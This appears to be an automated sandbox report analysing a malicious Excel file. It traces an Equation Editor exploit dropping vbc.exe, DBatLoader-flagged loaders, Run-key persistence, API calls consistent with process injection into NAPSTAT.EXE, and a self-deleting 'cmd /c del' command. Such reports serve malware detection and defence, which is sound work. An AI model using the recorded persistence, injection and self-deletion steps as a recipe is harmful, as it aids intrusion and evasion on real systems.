Source: 00000007.00000003.560491541.00000000046D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: Process Memory Space: Odhbljup.exe PID: 2192, type: MEMORYSTR	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: C:\Users\user\pujlbhdO.url, type: DROPPED	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019

Found potential string decryption / allocating functions

Source: C:\Users\Public\vbc.exe	Code function: String function: 004042E4 appears 81 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 004067E4 appears 61 times
Source: C:\Users\user\Odhbljup.exe	Code function: String function: 004038F8 appears 44 times
Source: C:\Users\user\Odhbljup.exe	Code function: String function: 004049F0 appears 38 times
Source: C:\Users\user\Odhbljup.exe	Code function: String function: 004042E4 appears 162 times
Source: C:\Users\user\Odhbljup.exe	Code function: String function: 0040E2B4 appears 42 times
Source: C:\Users\user\Odhbljup.exe	Code function: String function: 0040F5BC appears 44 times
Source: C:\Users\user\Odhbljup.exe	Code function: String function: 004067E4 appears 122 times
Source: C:\Users\user\Odhbljup.exe	Code function: String function: 00404308 appears 46 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: String function: 02013F92 appears 132 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: String function: 0201373B appears 248 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: String function: 01FCE2A8 appears 58 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: String function: 01FCDF5C appears 124 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: String function: 0203F970 appears 84 times

Contains functionality to call native functions

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00450FCC NtdllDefWindowProc_A,	4_2_00450FCC
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0044629C GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A,	4_2_0044629C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00436A08 NtdllDefWindowProc_A,GetCapture,	4_2_00436A08
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00451770 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,	4_2_00451770
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00451820 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,	4_2_00451820
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0042BE54 NtdllDefWindowProc_A,	4_2_0042BE54
Source: C:\Users\Public\vbc.exe	Code function: 4_2_02128690 NtReadFile,	4_2_02128690
Source: C:\Users\Public\vbc.exe	Code function: 4_2_021287C0 NtAllocateVirtualMemory,	4_2_021287C0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_021285E0 NtCreateFile,	4_2_021285E0
Source: C:\Users\user\Odhbljup.exe	Code function: 7_2_00450FCC NtdllDefWindowProc_A,	7_2_00450FCC
Source: C:\Users\user\Odhbljup.exe	Code function: 7_2_0044629C GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A,	7_2_0044629C
Source: C:\Users\user\Odhbljup.exe	Code function: 7_2_00436A08 NtdllDefWindowProc_A,GetCapture,	7_2_00436A08
Source: C:\Users\user\Odhbljup.exe	Code function: 7_2_00451770 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,	7_2_00451770
Source: C:\Users\user\Odhbljup.exe	Code function: 7_2_00451820 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,	7_2_00451820
Source: C:\Users\user\Odhbljup.exe	Code function: 7_2_0042BE54 NtdllDefWindowProc_A,	7_2_0042BE54
Source: C:\Users\user\Odhbljup.exe	Code function: 10_2_00450FCC NtdllDefWindowProc_A,	10_2_00450FCC
Source: C:\Users\user\Odhbljup.exe	Code function: 10_2_0044629C GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A,	10_2_0044629C
Source: C:\Users\user\Odhbljup.exe	Code function: 10_2_00436A08 NtdllDefWindowProc_A,GetCapture,	10_2_00436A08
Source: C:\Users\user\Odhbljup.exe	Code function: 10_2_00451770 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,	10_2_00451770
Source: C:\Users\user\Odhbljup.exe	Code function: 10_2_00451820 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,	10_2_00451820
Source: C:\Users\user\Odhbljup.exe	Code function: 10_2_0042BE54 NtdllDefWindowProc_A,	10_2_0042BE54
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FC00C4 NtCreateFile,LdrInitializeThunk,	12_2_01FC00C4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FC07AC NtCreateMutant,LdrInitializeThunk,	12_2_01FC07AC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBF9F0 NtClose,LdrInitializeThunk,	12_2_01FBF9F0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBF900 NtReadFile,LdrInitializeThunk,	12_2_01FBF900
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBFBB8 NtQueryInformationToken,LdrInitializeThunk,	12_2_01FBFBB8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBFB68 NtFreeVirtualMemory,LdrInitializeThunk,	12_2_01FBFB68
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBFB50 NtCreateKey,LdrInitializeThunk,	12_2_01FBFB50
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBFAE8 NtQueryInformationProcess,LdrInitializeThunk,	12_2_01FBFAE8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	12_2_01FBFAD0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBFAB8 NtQueryValueKey,LdrInitializeThunk,	12_2_01FBFAB8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBFDC0 NtQuerySystemInformation,LdrInitializeThunk,	12_2_01FBFDC0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBFD8C NtDelayExecution,LdrInitializeThunk,	12_2_01FBFD8C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBFC60 NtMapViewOfSection,LdrInitializeThunk,	12_2_01FBFC60
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBFFB4 NtCreateSection,LdrInitializeThunk,	12_2_01FBFFB4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	12_2_01FBFED0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FC01D4 NtSetValueKey,	12_2_01FC01D4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FC1148 NtOpenThread,	12_2_01FC1148
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FC010C NtOpenDirectoryObject,	12_2_01FC010C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FC10D0 NtOpenProcessToken,	12_2_01FC10D0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FC0078 NtResumeThread,	12_2_01FC0078
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FC0060 NtQuerySection,	12_2_01FC0060
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FC0048 NtProtectVirtualMemory,	12_2_01FC0048
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBF938 NtWriteFile,	12_2_01FBF938
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FC1930 NtSetContextThread,	12_2_01FC1930
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBF8CC NtWaitForSingleObject,	12_2_01FBF8CC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBFBE8 NtQueryVirtualMemory,	12_2_01FBFBE8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBFA50 NtEnumerateValueKey,	12_2_01FBFA50
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBFA20 NtQueryInformationFile,	12_2_01FBFA20
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FC1D80 NtSuspendThread,	12_2_01FC1D80
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBFD5C NtEnumerateKey,	12_2_01FBFD5C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBFC90 NtUnmapViewOfSection,	12_2_01FBFC90
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBFC48 NtSetInformationFile,	12_2_01FBFC48
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FC0C40 NtGetContextThread,	12_2_01FC0C40
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBFC30 NtOpenProcess,	12_2_01FBFC30
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBFFFC NtCreateProcessEx,	12_2_01FBFFFC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBFF34 NtQueueApcThread,	12_2_01FBFF34
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBFEA0 NtReadVirtualMemory,	12_2_01FBFEA0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FBFE24 NtWriteVirtualMemory,	12_2_01FBFE24
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_000985E0 NtCreateFile,	12_2_000985E0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_00098690 NtReadFile,	12_2_00098690
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_00098710 NtClose,	12_2_00098710
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_000987C0 NtAllocateVirtualMemory,	12_2_000987C0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_00396A82 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,	12_2_00396A82
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_00396F06 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,	12_2_00396F06
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_00396F12 NtQueryInformationProcess,	12_2_00396F12

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$7009.xlsx

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@11/33@8/2

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00423F40 GetLastError,FormatMessageA,

4_2_00423F40

Source: C:\Users\Public\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0041C8A8 FindResourceA,LoadResource,SizeofResource,LockResource,

4_2_0041C8A8

Source: EXCEL.EXE, 00000000.00000002.682149975.00000000050B0000.00000002.00020000.sdmp

Binary or memory string: .VBPud<_

Source: 7009.xlsx	Virustotal: Detection: 35%
Source: 7009.xlsx	ReversingLabs: Detection: 40%

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Console Write: ................................C.:.\.U.s.e.r.s.\.P.u.b.l.i.c.\.v.b.c...e.x.e...................0.......................2.......................			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Console Write: ................................A.c.c.e.s.s. .i.s. .d.e.n.i.e.d.........@1........4.t...........0.......................&.......................			Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\Odhbljup.exe "C:\Users\user\Odhbljup.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\Odhbljup.exe "C:\Users\user\Odhbljup.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\Odhbljup.exe "C:\Users\user\Odhbljup.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\Odhbljup.exe "C:\Users\user\Odhbljup.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\InProcServer32

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRE55E.tmp

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00408B32 GetDiskFreeSpaceA,

4_2_00408B32

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000004.00000003.515473783.0000000004C20000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.567269073.0000000004DB0000.00000040.00000001.sdmp, vbc.exe, 00000004.00000003.514018824.0000000004AC0000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.567928489.0000000004F30000.00000040.00000001.sdmp, NAPSTAT.EXE
Source:	Binary string: napstat.pdb source: vbc.exe, 00000004.00000002.563648923.0000000003CF0000.00000040.00020000.sdmp, vbc.exe, 00000004.00000003.557853611.0000000004911000.00000004.00000001.sdmp

Data Obfuscation:

Yara detected DBatLoader

Source: Yara match	File source: 10.3.Odhbljup.exe.1d02094.286.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.Odhbljup.exe.1d6d598.277.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.Odhbljup.exe.1d82094.284.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.vbc.exe.31d598.276.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.vbc.exe.332094.286.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.vbc.exe.331ef4.277.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.Odhbljup.exe.1d6d594.281.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.Odhbljup.exe.1ced598.277.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.Odhbljup.exe.1d6d598.275.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.Odhbljup.exe.1d81ef4.276.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.vbc.exe.31d620.283.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.vbc.exe.31d598.275.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.Odhbljup.exe.1ced594.279.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.Odhbljup.exe.1d01ef4.276.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.Odhbljup.exe.1ced598.275.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.vbc.exe.331ef4.278.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.Odhbljup.exe.1d6d620.283.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.Odhbljup.exe.1ced594.281.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.Odhbljup.exe.1ced620.283.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.vbc.exe.331f44.281.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.vbc.exe.31d594.280.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.Odhbljup.exe.1d81f44.280.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.31d734.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.Odhbljup.exe.1d01f44.280.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000003.480010544.0000000000320000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.541642413.0000000001D5C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.479622331.000000000031C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.479715174.000000000030C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.540973597.0000000001D5C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.566824102.0000000001CF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.478861422.000000000030C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.541230145.0000000001D6C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.566299990.0000000001D00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.541187560.0000000001D5C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.541036876.0000000001D6C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.566467574.0000000001CEC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.541516401.0000000001D80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.478734155.0000000000334000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.478780322.000000000030C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.541395274.0000000001D70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.478805681.000000000031C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.479654433.0000000000334000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.480122394.000000000030C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.565869963.0000000001D04000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.566017629.0000000001CDC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.566757773.0000000001CDC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.566404823.0000000001CDC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.541266508.0000000001D84000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.566183618.0000000001CEC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.566603029.0000000001D04000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.478831765.0000000000330000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.541317929.0000000001D5C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.559751606.000000000031C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.540909993.0000000001D84000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.567012932.0000000001CDC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.566928975.0000000001D00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.480088573.0000000000330000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.541124265.0000000001D80000.00000004.00000001.sdmp, type: MEMORY

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0043DD6C push 0043DDF9h; ret	4_2_0043DDF1
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00458108 push 00458140h; ret	4_2_00458138
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0042A1F4 push 0042A220h; ret	4_2_0042A218
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004201F8 push ecx; mov dword ptr [esp], edx	4_2_004201FD
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00458180 push 004581ACh; ret	4_2_004581A4
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0042A1AC push 0042A1EAh; ret	4_2_0042A1E2
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0045A1B4 push 0045A427h; ret	4_2_0045A41F
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0042A22C push 0042A264h; ret	4_2_0042A25C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0042C294 push 0042C2D7h; ret	4_2_0042C2CF
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00406340 push 00406391h; ret	4_2_00406389
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0042C30C push 0042C338h; ret	4_2_0042C330
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00428448 push 00428518h; ret	4_2_00428510
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0042A550 push 0042A57Ch; ret	4_2_0042A574
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040E5F8 push 0040E624h; ret	4_2_0040E61C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00406588 push 004065B4h; ret	4_2_004065AC
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00406600 push 0040662Ch; ret	4_2_00406624
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00414628 push ecx; mov dword ptr [esp], eax	4_2_0041462B
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00428628 push 00428654h; ret	4_2_0042864C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0042A6FC push 0042A728h; ret	4_2_0042A720
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0041C6A4 push ecx; mov dword ptr [esp], edx	4_2_0041C6A6
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00440764 push 00440790h; ret	4_2_00440788
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004547B8 push 004547F0h; ret	4_2_004547E8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004288FC push 00428928h; ret	4_2_00428920
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0045A958 push 0045A984h; ret	4_2_0045A97C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0042C918 push 0042C971h; ret	4_2_0042C969
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004289F8 push 00428A24h; ret	4_2_00428A1C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0041C9FF pushfd ; retf 0041h	4_2_0041CA51
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0045A990 push 0045A9B6h; ret	4_2_0045A9AE
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0042C9B4 push 0042C9ECh; ret	4_2_0042C9E4
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0042CA48 push 0042CA74h; ret	4_2_0042CA6C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0043EA9C push ecx; mov dword ptr [esp], edx	4_2_0043EAA0

Contains functionality to dynamically determine API calls

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00459820 LoadLibraryA,GetProcAddress,

4_2_00459820

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\binso[1].exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\Odhbljup.exe	Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\Odhbljup.exe			Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\Odhbljup.exe			Jump to dropped file

Source: C:\Users\Public\vbc.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Odhbljup			Jump to behavior
Source: C:\Users\Public\vbc.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Odhbljup			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00451054 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	4_2_00451054
